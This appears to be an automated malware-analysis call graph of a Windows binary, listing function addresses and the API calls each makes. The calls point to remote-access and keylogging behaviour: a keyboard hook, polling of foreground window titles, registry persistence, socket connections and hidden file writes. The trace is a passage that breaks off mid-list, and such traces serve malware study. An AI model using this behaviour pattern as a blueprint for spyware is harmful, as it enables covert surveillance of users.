47909 4052fd 28 API calls 47400->47909 47406 40f2ed 47408 41bc5e 28 API calls 47406->47408 47410 40f2fd 47408->47410 47910 41361b 31 API calls 47410->47910 47414 40f313 47415 401f09 11 API calls 47414->47415 47418 40f31e 47415->47418 47416 40f346 DeleteFileW 47417 40f34d 47416->47417 47416->47418 47417->47224 47418->47224 47418->47416 47419 40f334 Sleep 47418->47419 47419->47418 47420->47098 47421->47102 47422->47107 47423->47105 47424->47115 47425->47116 47426->47118 47427->47121 47428->47125 47429->47127 47434 44fb68 47430->47434 47433 438f5a 8 API calls 3 library calls 47433->47132 47437 44fb85 47434->47437 47438 44fb81 47434->47438 47436 4345bd 47436->47130 47436->47433 47437->47438 47440 449ca6 47437->47440 47452 434fcb 47438->47452 47441 449cb2 ___BuildCatchObject 47440->47441 47459 445888 EnterCriticalSection 47441->47459 47443 449cb9 47460 450183 47443->47460 47445 449cc8 47446 449cd7 47445->47446 47471 449b3a 23 API calls 47445->47471 47473 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47446->47473 47449 449cd2 47472 449bf0 GetStdHandle GetFileType 47449->47472 47450 449ce8 ___BuildCatchObject 47450->47437 47453 434fd6 IsProcessorFeaturePresent 47452->47453 47454 434fd4 47452->47454 47456 435018 47453->47456 47454->47436 47495 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47456->47495 47458 4350fb 47458->47436 47459->47443 47461 45018f ___BuildCatchObject 47460->47461 47462 4501b3 47461->47462 47463 45019c 47461->47463 47474 445888 EnterCriticalSection 47462->47474 47482 4405dd 20 API calls __dosmaperr 47463->47482 47466 4501eb 47483 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47466->47483 47467 4501bf 47467->47466 47475 4500d4 47467->47475 47469 4501a1 ___BuildCatchObject _strftime 47469->47445 47471->47449 47472->47446 47473->47450 47474->47467 47484 445af3 47475->47484 47477 4500f3 47492 446782 20 API calls __dosmaperr 47477->47492 47480 450145 47480->47467 47481 4500e6 47481->47477 47491 448a84 11 API calls 2 library calls 47481->47491 47482->47469 47483->47469 47489 445b00 __Getctype 47484->47489 47485 445b40 47494 4405dd 20 API calls __dosmaperr 47485->47494 47486 445b2b RtlAllocateHeap 47487 445b3e 47486->47487 47486->47489 47487->47481 47489->47485 47489->47486 47493 442f80 7 API calls 2 library calls 47489->47493 47491->47481 47492->47480 47493->47489 47494->47487 47495->47458 47497 434b27 GetStartupInfoW 47496->47497 47497->47136 47499 44f06b 47498->47499 47500 44f062 47498->47500 47499->47140 47503 44ef58 49 API calls 5 library calls 47500->47503 47502->47140 47503->47499 47505 41cb8f LoadLibraryA GetProcAddress 47504->47505 47506 41cb7f GetModuleHandleA GetProcAddress 47504->47506 47507 41cbb8 44 API calls 47505->47507 47508 41cba8 LoadLibraryA GetProcAddress 47505->47508 47506->47505 47507->47144 47508->47507 47913 41b4a8 FindResourceA 47509->47913 47513 40f3ed ctype 47923 4020b7 47513->47923 47516 401fe2 28 API calls 47517 40f413 47516->47517 47518 401fd8 11 API calls 47517->47518 47519 40f41c 47518->47519 47520 43bd51 ___std_exception_copy 21 API calls 47519->47520 47521 40f42d ctype 47520->47521 47929 406dd8 47521->47929 47523 40f460 47523->47146 47525 40210c 47524->47525 47526 4023ce 11 API calls 47525->47526 47527 402126 47526->47527 47528 402569 28 API calls 47527->47528 47529 402134 47528->47529 47529->47149 47966 4020df 47530->47966 47532 41be9e 47533 401fd8 11 API calls 47532->47533 47534 41bed0 47533->47534 47536 401fd8 11 API calls 47534->47536 47535 41bea0 47982 4041a2 28 API calls 47535->47982 47539 41bed8 47536->47539 47541 401fd8 11 API calls 47539->47541 47540 41beac 47542 401fe2 28 API calls 47540->47542 47544 40ea24 47541->47544 47545 41beb5 47542->47545 47543 401fe2 28 API calls 47551 41be2e 47543->47551 47552 40fb17 47544->47552 47546 401fd8 11 API calls 47545->47546 47548 41bebd 47546->47548 47547 401fd8 11 API calls 47547->47551 47549 41ce34 28 API calls 47548->47549 47549->47532 47551->47532 47551->47535 47551->47543 47551->47547 47970 4041a2 28 API calls 47551->47970 47971 41ce34 47551->47971 47553 40fb23 47552->47553 47555 40fb2a 47552->47555 48008 402163 11 API calls 47553->48008 47555->47154 47557 402163 47556->47557 47558 40219f 47557->47558 48009 402730 11 API calls 47557->48009 47558->47156 47560 402184 48010 402712 11 API calls std::_Deallocate 47560->48010 47563 401e6d 47562->47563 47564 401e75 47563->47564 48011 402158 22 API calls 47563->48011 47564->47161 47568 4020df 11 API calls 47567->47568 47569 40532a 47568->47569 48012 4032a0 47569->48012 47571 405346 47571->47169 48017 4051ef 47572->48017 47574 406391 48021 402055 47574->48021 47577 401fe2 47578 401ff1 47577->47578 47585 402039 47577->47585 47579 4023ce 11 API calls 47578->47579 47580 401ffa 47579->47580 47581 402015 47580->47581 47582 40203c 47580->47582 48055 403098 28 API calls 47581->48055 47583 40267a 11 API calls 47582->47583 47583->47585 47586 401fd8 47585->47586 47587 4023ce 11 API calls 47586->47587 47588 401fe1 47587->47588 47588->47181 47590 401fd2 47589->47590 47591 401fc9 47589->47591 47590->47187 48056 4025e0 28 API calls 47591->48056 48057 401fab 47593->48057 47595 40d073 CreateMutexA GetLastError 47595->47203 48058 41bfb7 47596->48058 47601 401fe2 28 API calls 47602 41b2ff 47601->47602 47603 401fd8 11 API calls 47602->47603 47604 41b307 47603->47604 47605 4135a6 31 API calls 47604->47605 47607 41b35d 47604->47607 47606 41b330 47605->47606 47608 41b33b StrToIntA 47606->47608 47607->47209 47609 41b349 47608->47609 47612 41b352 47608->47612 48066 41cf69 22 API calls 47609->48066 47611 401fd8 11 API calls 47611->47607 47612->47611 47614 40772a 47613->47614 47615 413549 3 API calls 47614->47615 47616 407731 47615->47616 47616->47221 47616->47222 47618 41bc72 47617->47618 48067 40b904 47618->48067 47620 41bc7a 47620->47237 47622 401f22 47621->47622 47629 401f6a 47621->47629 47623 402252 11 API calls 47622->47623 47624 401f2b 47623->47624 47625 401f6d 47624->47625 47626 401f46 47624->47626 48100 402336 47625->48100 48099 40305c 28 API calls 47626->48099 47630 401f09 47629->47630 47631 402252 11 API calls 47630->47631 47632 401f12 47631->47632 47632->47249 47634 413965 47633->47634 47635 406dd8 28 API calls 47634->47635 47636 41397a 47635->47636 47637 4020f6 28 API calls 47636->47637 47638 41398a 47637->47638 47639 41376f 14 API calls 47638->47639 47640 413994 47639->47640 47641 401fd8 11 API calls 47640->47641 47642 4139a1 47641->47642 47642->47297 47644 40209b 47643->47644 47645 4023ce 11 API calls 47644->47645 47646 4020a6 47645->47646 48104 4024ed 47646->48104 47650 413788 47649->47650 47651 4137bf 47649->47651 47654 41379a RegSetValueExA RegCloseKey 47650->47654 47652 401fd8 11 API calls 47651->47652 47653 40ef9e 47652->47653 47653->47300 47654->47651 47656 43bac5 _strftime 47655->47656 48108 43ae03 47656->48108 47658 40efb7 47658->47306 47658->47308 47660 41b5a0 47659->47660 47661 41b505 GetLocalTime 47659->47661 47662 401fd8 11 API calls 47660->47662 47663 40531e 28 API calls 47661->47663 47665 41b5a8 47662->47665 47664 41b547 47663->47664 47666 406383 28 API calls 47664->47666 47667 401fd8 11 API calls 47665->47667 47668 41b553 47666->47668 47669 40f00d 47667->47669 48136 402f10 47668->48136 47669->47324 47672 406383 28 API calls 47673 41b56b 47672->47673 48141 407200 77 API calls 47673->48141 47675 41b579 47676 401fd8 11 API calls 47675->47676 47677 41b585 47676->47677 47678 401fd8 11 API calls 47677->47678 47679 41b58e 47678->47679 47680 401fd8 11 API calls 47679->47680 47681 41b597 47680->47681 47682 401fd8 11 API calls 47681->47682 47682->47660 47684 409e02 _wcslen 47683->47684 47685 409e24 47684->47685 47686 409e0d 47684->47686 47688 40da34 31 API calls 47685->47688 47687 40da34 31 API calls 47686->47687 47689 409e15 47687->47689 47690 409e2c 47688->47690 47692 401f13 28 API calls 47689->47692 47691 401f13 28 API calls 47690->47691 47693 409e3a 47691->47693 47694 409e1f 47692->47694 47695 401f09 11 API calls 47693->47695 47697 401f09 11 API calls 47694->47697 47696 409e42 47695->47696 48160 40915b 28 API calls 47696->48160 47699 409e79 47697->47699 48145 40a109 47699->48145 47700 409e54 48161 403014 47700->48161 47705 401f13 28 API calls 47706 409e69 47705->47706 47707 401f09 11 API calls 47706->47707 47707->47694 48366 40417e 47708->48366 47713 403014 28 API calls 47714 41b672 47713->47714 47715 401f09 11 API calls 47714->47715 47716 41b67b 47715->47716 47717 401f09 11 API calls 47716->47717 47718 40f223 47717->47718 47718->47377 47720 413520 RegQueryValueExA RegCloseKey 47719->47720 47721 40f2e4 47719->47721 47720->47721 47721->47250 47721->47406 47723 413a3f RegDeleteValueW 47722->47723 47724 40f392 47722->47724 47723->47724 47724->47244 47726 40dd5b 47725->47726 47727 4134ff 3 API calls 47726->47727 47729 40dd62 47727->47729 47728 40dd81 47733 414f2a 47728->47733 47729->47728 48458 401707 47729->48458 47731 40dd6f 48461 413877 RegCreateKeyA 47731->48461 47734 4020df 11 API calls 47733->47734 47735 414f3e 47734->47735 48475 41b8b3 47735->48475 47738 4020df 11 API calls 47739 414f54 47738->47739 47740 401e65 22 API calls 47739->47740 47741 414f62 47740->47741 47742 43baac _strftime 40 API calls 47741->47742 47743 414f6f 47742->47743 47744 414f81 47743->47744 47745 414f74 Sleep 47743->47745 47746 402093 28 API calls 47744->47746 47745->47744 47747 414f90 47746->47747 47748 401e65 22 API calls 47747->47748 47749 414f99 47748->47749 47750 4020f6 28 API calls 47749->47750 47751 414fa4 47750->47751 47752 41be1b 28 API calls 47751->47752 47753 414fac 47752->47753 48479 40489e WSAStartup 47753->48479 47755 414fb6 47756 401e65 22 API calls 47755->47756 47757 414fbf 47756->47757 47758 401e65 22 API calls 47757->47758 47782 41503e 47757->47782 47759 414fd8 47758->47759 47760 401e65 22 API calls 47759->47760 47762 414fe9 47760->47762 47761 4020f6 28 API calls 47761->47782 47764 401e65 22 API calls 47762->47764 47763 41be1b 28 API calls 47763->47782 47765 414ffa 47764->47765 47767 401e65 22 API calls 47765->47767 47766 406c1e 28 API calls 47766->47782 47768 41500b 47767->47768 47770 401e65 22 API calls 47768->47770 47769 401fe2 28 API calls 47769->47782 47771 41501c 47770->47771 47772 401e65 22 API calls 47771->47772 47773 41502e 47772->47773 48655 40473d 89 API calls 47773->48655 47775 401e65 22 API calls 47775->47782 47777 41518c WSAGetLastError 48485 41cae1 47777->48485 47782->47761 47782->47763 47782->47766 47782->47769 47782->47775 47782->47777 47785 40531e 28 API calls 47782->47785 47786 401e8d 11 API calls 47782->47786 47787 43baac _strftime 40 API calls 47782->47787 47789 402f10 28 API calls 47782->47789 47790 402093 28 API calls 47782->47790 47791 41b4ef 80 API calls 47782->47791 47794 40905c 28 API calls 47782->47794 47795 441e81 20 API calls 47782->47795 47796 4136f8 3 API calls 47782->47796 47797 4135a6 31 API calls 47782->47797 47798 40417e 28 API calls 47782->47798 47801 41bd1e 28 API calls 47782->47801 47802 41bb8e 28 API calls 47782->47802 47803 401e65 22 API calls 47782->47803 47810 406383 28 API calls 47782->47810 47811 402ea1 28 API calls 47782->47811 47813 401fd8 11 API calls 47782->47813 47815 415a33 47782->47815 47817 415a71 CreateThread 47782->47817 47818 401f09 11 API calls 47782->47818 48480 414ee9 47782->48480 48496 40482d 47782->48496 48503 404f51 47782->48503 48518 4048c8 connect 47782->48518 48578 41b7e0 47782->48578 48581 4145bd 47782->48581 48584 40dd89 47782->48584 48590 41bc42 47782->48590 48593 41bae6 47782->48593 48595 41ba96 47782->48595 48600 40f8d1 GetLocaleInfoA 47782->48600 48603 402f31 47782->48603 48608 404aa1 47782->48608 48623 404c10 47782->48623 48642 404e26 WaitForSingleObject 47782->48642 48656 4052fd 28 API calls 47782->48656 47785->47782 47786->47782 47788 415acf Sleep 47787->47788 47788->47782 47789->47782 47790->47782 47791->47782 47794->47782 47795->47782 47796->47782 47797->47782 47798->47782 47801->47782 47802->47782 47804 415439 GetTickCount 47803->47804 47805 41bb8e 28 API calls 47804->47805 47805->47782 47810->47782 47811->47782 47813->47782 48657 40b051 85 API calls 47815->48657 47817->47782 48738 41ad17 104 API calls 47817->48738 47818->47782 47819->47162 47820->47170 47821->47174 47824 4020df 11 API calls 47823->47824 47825 406c2a 47824->47825 47826 4032a0 28 API calls 47825->47826 47827 406c47 47826->47827 47827->47195 47829 40eba4 47828->47829 47830 413573 RegQueryValueExA RegCloseKey 47828->47830 47829->47192 47829->47210 47830->47829 47831->47198 47832->47229 47833->47222 47834->47212 47835->47227 47837 401f86 11 API calls 47836->47837 47838 40da50 47837->47838 47839 40da70 47838->47839 47840 40daa5 47838->47840 47841 40da66 47838->47841 48739 41b5b4 29 API calls 47839->48739 47842 41bfb7 GetCurrentProcess 47840->47842 47844 40db99 GetLongPathNameW 47841->47844 47846 40daaa 47842->47846 47845 40417e 28 API calls 47844->47845 47848 40dbae 47845->47848 47849 40db00 47846->47849 47850 40daae 47846->47850 47847 40da79 47851 401f13 28 API calls 47847->47851 47852 40417e 28 API calls 47848->47852 47853 40417e 28 API calls 47849->47853 47854 40417e 28 API calls 47850->47854 47855 40da83 47851->47855 47856 40dbbd 47852->47856 47857 40db0e 47853->47857 47858 40dabc 47854->47858 47860 401f09 11 API calls 47855->47860 48742 40ddd1 28 API calls 47856->48742 47863 40417e 28 API calls 47857->47863 47864 40417e 28 API calls 47858->47864 47860->47841 47861 40dbd0 48743 402fa5 28 API calls 47861->48743 47866 40db24 47863->47866 47867 40dad2 47864->47867 47865 40dbdb 48744 402fa5 28 API calls 47865->48744 48741 402fa5 28 API calls 47866->48741 48740 402fa5 28 API calls 47867->48740 47871 40dbe5 47874 401f09 11 API calls 47871->47874 47872 40db2f 47875 401f13 28 API calls 47872->47875 47873 40dadd 47876 401f13 28 API calls 47873->47876 47877 40dbef 47874->47877 47878 40db3a 47875->47878 47879 40dae8 47876->47879 47880 401f09 11 API calls 47877->47880 47881 401f09 11 API calls 47878->47881 47882 401f09 11 API calls 47879->47882 47884 40dbf8 47880->47884 47885 40db43 47881->47885 47883 40daf1 47882->47883 47887 401f09 11 API calls 47883->47887 47888 401f09 11 API calls 47884->47888 47886 401f09 11 API calls 47885->47886 47886->47855 47887->47855 47889 40dc01 47888->47889 47890 401f09 11 API calls 47889->47890 47891 40dc0a 47890->47891 47892 401f09 11 API calls 47891->47892 47893 40dc13 47892->47893 47893->47285 47894->47298 47895->47320 47897 41371e RegQueryValueExA RegCloseKey 47896->47897 47898 413742 47896->47898 47897->47898 47898->47278 47899->47312 47903 4344ef 47900->47903 47901 43bd51 ___std_exception_copy 21 API calls 47901->47903 47902 40f0d1 47902->47350 47903->47901 47903->47902 48745 442f80 7 API calls 2 library calls 47903->48745 48746 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47903->48746 48747 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47903->48747 47907->47382 47908->47370 47910->47414 47911->47217 47914 41b4c5 LoadResource LockResource SizeofResource 47913->47914 47915 40f3de 47913->47915 47914->47915 47916 43bd51 47915->47916 47921 446137 __Getctype 47916->47921 47917 446175 47933 4405dd 20 API calls __dosmaperr 47917->47933 47918 446160 RtlAllocateHeap 47920 446173 47918->47920 47918->47921 47920->47513 47921->47917 47921->47918 47932 442f80 7 API calls 2 library calls 47921->47932 47924 4020bf 47923->47924 47934 4023ce 47924->47934 47926 4020ca 47938 40250a 47926->47938 47928 4020d9 47928->47516 47930 4020b7 28 API calls 47929->47930 47931 406dec 47930->47931 47931->47523 47932->47921 47933->47920 47935 402428 47934->47935 47936 4023d8 47934->47936 47935->47926 47936->47935 47945 4027a7 11 API calls std::_Deallocate 47936->47945 47939 40251a 47938->47939 47940 402520 47939->47940 47941 402535 47939->47941 47946 402569 47940->47946 47956 4028e8 28 API calls 47941->47956 47944 402533 47944->47928 47945->47935 47957 402888 47946->47957 47948 40257d 47949 402592 47948->47949 47950 4025a7 47948->47950 47962 402a34 22 API calls 47949->47962 47964 4028e8 28 API calls 47950->47964 47953 40259b 47963 4029da 22 API calls 47953->47963 47955 4025a5 47955->47944 47956->47944 47958 402890 47957->47958 47959 402898 47958->47959 47965 402ca3 22 API calls 47958->47965 47959->47948 47962->47953 47963->47955 47964->47955 47967 4020e7 47966->47967 47968 4023ce 11 API calls 47967->47968 47969 4020f2 47968->47969 47969->47551 47970->47551 47972 41ce41 47971->47972 47973 41cea0 47972->47973 47977 41ce51 47972->47977 47974 41ceba 47973->47974 47975 41cfe0 28 API calls 47973->47975 47992 41d146 28 API calls 47974->47992 47975->47974 47978 41ce89 47977->47978 47983 41cfe0 47977->47983 47991 41d146 28 API calls 47978->47991 47979 41ce9c 47979->47551 47982->47540 47985 41cfe8 47983->47985 47984 41d01a 47984->47978 47985->47984 47986 41d01e 47985->47986 47989 41d002 47985->47989 48003 402725 22 API calls 47986->48003 47993 41d051 47989->47993 47991->47979 47992->47979 47994 41d05b __EH_prolog 47993->47994 48004 402717 22 API calls 47994->48004 47996 41d06e 48005 41d15d 11 API calls 47996->48005 47998 41d094 47999 41d0cc 47998->47999 48006 402730 11 API calls 47998->48006 47999->47984 48001 41d0b3 48007 402712 11 API calls std::_Deallocate 48001->48007 48004->47996 48005->47998 48006->48001 48007->47999 48008->47555 48009->47560 48010->47558 48014 4032aa 48012->48014 48013 4032c9 48013->47571 48014->48013 48016 4028e8 28 API calls 48014->48016 48016->48013 48018 4051fb 48017->48018 48027 405274 48018->48027 48020 405208 48020->47574 48022 402061 48021->48022 48023 4023ce 11 API calls 48022->48023 48024 40207b 48023->48024 48051 40267a 48024->48051 48028 405282 48027->48028 48029 405288 48028->48029 48030 40529e 48028->48030 48038 4025f0 48029->48038 48032 4052f5 48030->48032 48033 4052b6 48030->48033 48048 4028a4 22 API calls 48032->48048 48037 40529c 48033->48037 48047 4028e8 28 API calls 48033->48047 48037->48020 48039 402888 22 API calls 48038->48039 48040 402602 48039->48040 48041 402672 48040->48041 48042 402629 48040->48042 48050 4028a4 22 API calls 48041->48050 48046 40263b 48042->48046 48049 4028e8 28 API calls 48042->48049 48046->48037 48047->48037 48049->48046 48052 40268b 48051->48052 48053 4023ce 11 API calls 48052->48053 48054 40208d 48053->48054 48054->47577 48055->47585 48056->47590 48059 41bfc4 GetCurrentProcess 48058->48059 48060 41b2d1 48058->48060 48059->48060 48061 4135a6 RegOpenKeyExA 48060->48061 48062 4135d4 RegQueryValueExA RegCloseKey 48061->48062 48063 4135fe 48061->48063 48062->48063 48064 402093 28 API calls 48063->48064 48065 413613 48064->48065 48065->47601 48066->47612 48068 40b90c 48067->48068 48073 402252 48068->48073 48070 40b917 48077 40b92c 48070->48077 48072 40b926 48072->47620 48074 40225c 48073->48074 48075 4022ac 48073->48075 48074->48075 48084 402779 11 API calls std::_Deallocate 48074->48084 48075->48070 48078 40b966 48077->48078 48079 40b938 48077->48079 48096 4028a4 22 API calls 48078->48096 48085 4027e6 48079->48085 48083 40b942 48083->48072 48084->48075 48086 4027ef 48085->48086 48087 402851 48086->48087 48088 4027f9 48086->48088 48098 4028a4 22 API calls 48087->48098 48091 402802 48088->48091 48092 402815 48088->48092 48097 402aea 28 API calls __EH_prolog 48091->48097 48094 402813 48092->48094 48095 402252 11 API calls 48092->48095 48094->48083 48095->48094 48097->48094 48099->47629 48101 402347 48100->48101 48102 402252 11 API calls 48101->48102 48103 4023c7 48102->48103 48103->47629 48105 4024f9 48104->48105 48106 40250a 28 API calls 48105->48106 48107 4020b1 48106->48107 48107->47290 48124 43ba0a 48108->48124 48110 43ae50 48130 43a7b7 36 API calls 2 library calls 48110->48130 48112 43ae15 48112->48110 48113 43ae2a 48112->48113 48123 43ae2f _strftime 48112->48123 48129 4405dd 20 API calls __dosmaperr 48113->48129 48116 43ae5c 48117 43ae8b 48116->48117 48131 43ba4f 40 API calls __Tolower 48116->48131 48120 43aef7 48117->48120 48132 43b9b6 20 API calls 2 library calls 48117->48132 48133 43b9b6 20 API calls 2 library calls 48120->48133 48121 43afbe _strftime 48121->48123 48134 4405dd 20 API calls __dosmaperr 48121->48134 48123->47658 48125 43ba22 48124->48125 48126 43ba0f 48124->48126 48125->48112 48135 4405dd 20 API calls __dosmaperr 48126->48135 48128 43ba14 _strftime 48128->48112 48129->48123 48130->48116 48131->48116 48132->48120 48133->48121 48134->48123 48135->48128 48142 401fb0 48136->48142 48138 402f1e 48139 402055 11 API calls 48138->48139 48140 402f2d 48139->48140 48140->47672 48141->47675 48143 4025f0 28 API calls 48142->48143 48144 401fbd 48143->48144 48144->48138 48146 40a127 48145->48146 48147 413549 3 API calls 48146->48147 48148 40a12e 48147->48148 48149 40a142 48148->48149 48150 40a15c 48148->48150 48151 409e9b 48149->48151 48152 40a147 48149->48152 48166 40905c 48150->48166 48151->47343 48154 40905c 28 API calls 48152->48154 48156 40a155 48154->48156 48194 40a22d 29 API calls 48156->48194 48159 40a15a 48159->48151 48160->47700 48343 403222 48161->48343 48163 403022 48347 403262 48163->48347 48167 409072 48166->48167 48168 402252 11 API calls 48167->48168 48169 40908c 48168->48169 48195 404267 48169->48195 48171 40909a 48172 40a179 48171->48172 48207 40b8ec 48172->48207 48175 40a1a2 48178 402093 28 API calls 48175->48178 48176 40a1ca 48177 402093 28 API calls 48176->48177 48180 40a1d5 48177->48180 48179 40a1ac 48178->48179 48181 41bc5e 28 API calls 48179->48181 48182 402093 28 API calls 48180->48182 48183 40a1ba 48181->48183 48184 40a1e4 48182->48184 48211 40b164 31 API calls ___std_exception_copy 48183->48211 48186 41b4ef 80 API calls 48184->48186 48188 40a1e9 CreateThread 48186->48188 48187 40a1c1 48189 401fd8 11 API calls 48187->48189 48190 40a210 CreateThread 48188->48190 48191 40a204 CreateThread 48188->48191 48219 40a27d 48188->48219 48189->48176 48192 401f09 11 API calls 48190->48192 48216 40a289 48190->48216 48191->48190 48213 40a267 48191->48213 48193 40a224 48192->48193 48193->48151 48194->48159 48342 40a273 162 API calls 48194->48342 48196 402888 22 API calls 48195->48196 48197 40427b 48196->48197 48198 404290 48197->48198 48199 4042a5 48197->48199 48205 4042df 22 API calls 48198->48205 48200 4027e6 28 API calls 48199->48200 48202 4042a3 48200->48202 48202->48171 48203 404299 48206 402c48 22 API calls 48203->48206 48205->48203 48206->48202 48208 40b8f5 48207->48208 48209 40a197 48207->48209 48212 40b96c 28 API calls 48208->48212 48209->48175 48209->48176 48211->48187 48212->48209 48222 40a2b8 48213->48222 48253 40acd6 48216->48253 48295 40a726 48219->48295 48223 40a2d1 SetWindowsHookExA 48222->48223 48224 40a333 GetMessageA 48222->48224 48223->48224 48227 40a2ed GetLastError 48223->48227 48225 40a345 TranslateMessage DispatchMessageA 48224->48225 48237 40a270 48224->48237 48225->48224 48225->48237 48238 41bb8e 48227->48238 48244 441e81 48238->48244 48241 402093 28 API calls 48242 40a2fe 48241->48242 48243 4052fd 28 API calls 48242->48243 48245 441e8d 48244->48245 48248 441c7d 48245->48248 48247 41bbb2 48247->48241 48249 441c94 48248->48249 48251 441ccb _strftime 48249->48251 48252 4405dd 20 API calls __dosmaperr 48249->48252 48251->48247 48252->48251 48260 40ace4 48253->48260 48254 40a292 48255 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48257 40b904 28 API calls 48255->48257 48257->48260 48260->48254 48260->48255 48262 41bae6 GetTickCount 48260->48262 48263 40ad84 GetWindowTextW 48260->48263 48265 401f09 11 API calls 48260->48265 48266 40aedc 48260->48266 48267 40b8ec 28 API calls 48260->48267 48269 40ae49 Sleep 48260->48269 48270 441e81 20 API calls 48260->48270 48272 402093 28 API calls 48260->48272 48273 40add1 48260->48273 48277 403014 28 API calls 48260->48277 48278 406383 28 API calls 48260->48278 48280 40a636 12 API calls 48260->48280 48281 41bc5e 28 API calls 48260->48281 48282 401fd8 11 API calls 48260->48282 48283 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48260->48283 48284 401f86 48260->48284 48288 434770 23 API calls __onexit 48260->48288 48289 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48260->48289 48290 409044 28 API calls 48260->48290 48292 40b97c 28 API calls 48260->48292 48293 40b748 40 API calls 2 library calls 48260->48293 48294 4052fd 28 API calls 48260->48294 48262->48260 48263->48260 48265->48260 48268 401f09 11 API calls 48266->48268 48267->48260 48268->48254 48269->48260 48270->48260 48272->48260 48273->48260 48276 40905c 28 API calls 48273->48276 48291 40b164 31 API calls ___std_exception_copy 48273->48291 48276->48273 48277->48260 48278->48260 48280->48260 48281->48260 48282->48260 48285 401f8e 48284->48285 48286 402252 11 API calls 48285->48286 48287 401f99 48286->48287 48287->48260 48288->48260 48289->48260 48290->48260 48291->48273 48292->48260 48293->48260 48296 40a73b Sleep 48295->48296 48316 40a675 48296->48316 48298 40a286 48299 40a77b CreateDirectoryW 48303 40a74d 48299->48303 48300 40a78c GetFileAttributesW 48300->48303 48301 40a7a3 SetFileAttributesW 48301->48303 48303->48296 48303->48298 48303->48299 48303->48300 48303->48301 48305 401e65 22 API calls 48303->48305 48314 40a7ee 48303->48314 48329 41c3f1 48303->48329 48304 40a81d PathFileExistsW 48304->48314 48305->48303 48306 4020df 11 API calls 48306->48314 48307 4020b7 28 API calls 48307->48314 48309 40a926 SetFileAttributesW 48309->48303 48310 406dd8 28 API calls 48310->48314 48311 401fe2 28 API calls 48311->48314 48312 401fd8 11 API calls 48312->48314 48314->48304 48314->48306 48314->48307 48314->48309 48314->48310 48314->48311 48314->48312 48315 401fd8 11 API calls 48314->48315 48339 41c485 32 API calls 48314->48339 48340 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48314->48340 48315->48303 48317 40a722 48316->48317 48320 40a68b 48316->48320 48317->48303 48318 40a6aa CreateFileW 48319 40a6b8 GetFileSize 48318->48319 48318->48320 48319->48320 48321 40a6ed CloseHandle 48319->48321 48320->48318 48320->48321 48322 40a6ff 48320->48322 48323 40a6e2 Sleep 48320->48323 48324 40a6db 48320->48324 48321->48320 48322->48317 48326 40905c 28 API calls 48322->48326 48323->48321 48341 40b0dc 84 API calls 48324->48341 48327 40a71b 48326->48327 48328 40a179 123 API calls 48327->48328 48328->48317 48330 41c404 CreateFileW 48329->48330 48332 41c441 48330->48332 48333 41c43d 48330->48333 48334 41c461 WriteFile 48332->48334 48335 41c448 SetFilePointer 48332->48335 48333->48303 48337 41c474 48334->48337 48338 41c476 CloseHandle 48334->48338 48335->48334 48336 41c458 CloseHandle 48335->48336 48336->48333 48337->48338 48338->48333 48339->48314 48340->48314 48341->48323 48344 40322e 48343->48344 48353 403618 48344->48353 48346 40323b 48346->48163 48348 40326e 48347->48348 48349 402252 11 API calls 48348->48349 48350 403288 48349->48350 48351 402336 11 API calls 48350->48351 48352 403031 48351->48352 48352->47705 48354 403626 48353->48354 48355 403644 48354->48355 48356 40362c 48354->48356 48358 40369e 48355->48358 48360 40365c 48355->48360 48364 4036a6 28 API calls 48356->48364 48365 4028a4 22 API calls 48358->48365 48362 4027e6 28 API calls 48360->48362 48363 403642 48360->48363 48362->48363 48363->48346 48364->48363 48367 404186 48366->48367 48368 402252 11 API calls 48367->48368 48369 404191 48368->48369 48377 4041bc 48369->48377 48372 4042fc 48388 404353 48372->48388 48374 40430a 48375 403262 11 API calls 48374->48375 48376 404319 48375->48376 48376->47713 48378 4041c8 48377->48378 48381 4041d9 48378->48381 48380 40419c 48380->48372 48382 4041e9 48381->48382 48383 404206 48382->48383 48384 4041ef 48382->48384 48385 4027e6 28 API calls 48383->48385 48386 404267 28 API calls 48384->48386 48387 404204 48385->48387 48386->48387 48387->48380 48389 40435f 48388->48389 48392 404371 48389->48392 48391 40436d 48391->48374 48393 40437f 48392->48393 48394 404385 48393->48394 48395 40439e 48393->48395 48456 4034e6 28 API calls 48394->48456 48396 402888 22 API calls 48395->48396 48397 4043a6 48396->48397 48399 404419 48397->48399 48400 4043bf 48397->48400 48457 4028a4 22 API calls 48399->48457 48402 4027e6 28 API calls 48400->48402 48411 40439c 48400->48411 48402->48411 48411->48391 48456->48411 48464 43aa9a 48458->48464 48462 4138b9 48461->48462 48463 41388f RegSetValueExA RegCloseKey 48461->48463 48462->47728 48463->48462 48467 43aa1b 48464->48467 48466 40170d 48466->47731 48468 43aa2a 48467->48468 48469 43aa3e 48467->48469 48473 4405dd 20 API calls __dosmaperr 48468->48473 48472 43aa2f __alldvrm _strftime 48469->48472 48474 448957 11 API calls 2 library calls 48469->48474 48472->48466 48473->48472 48474->48472 48478 41b8f9 ctype ___scrt_fastfail 48475->48478 48476 402093 28 API calls 48477 414f49 48476->48477 48477->47738 48478->48476 48479->47755 48481 414f02 getaddrinfo WSASetLastError 48480->48481 48482 414ef8 48480->48482 48481->47782 48658 414d86 29 API calls ___std_exception_copy 48482->48658 48484 414efd 48484->48481 48486 4020df 11 API calls 48485->48486 48487 41caf5 FormatMessageA 48486->48487 48488 41cb13 48487->48488 48490 41cb21 48487->48490 48489 402093 28 API calls 48488->48489 48491 41cb1f 48489->48491 48492 41cb2c LocalFree 48490->48492 48494 401fd8 11 API calls 48491->48494 48493 402055 11 API calls 48492->48493 48493->48491 48495 41cb48 48494->48495 48495->47782 48497 404846 socket 48496->48497 48498 404839 48496->48498 48499 404860 CreateEventW 48497->48499 48500 404842 48497->48500 48659 40489e WSAStartup 48498->48659 48499->47782 48500->47782 48502 40483e 48502->48497 48502->48500 48504 404f65 48503->48504 48505 404fea 48503->48505 48506 404f6e 48504->48506 48507 404fc0 CreateEventA CreateThread 48504->48507 48508 404f7d GetLocalTime 48504->48508 48505->47782 48506->48507 48507->48505 48661 405150 48507->48661 48509 41bb8e 28 API calls 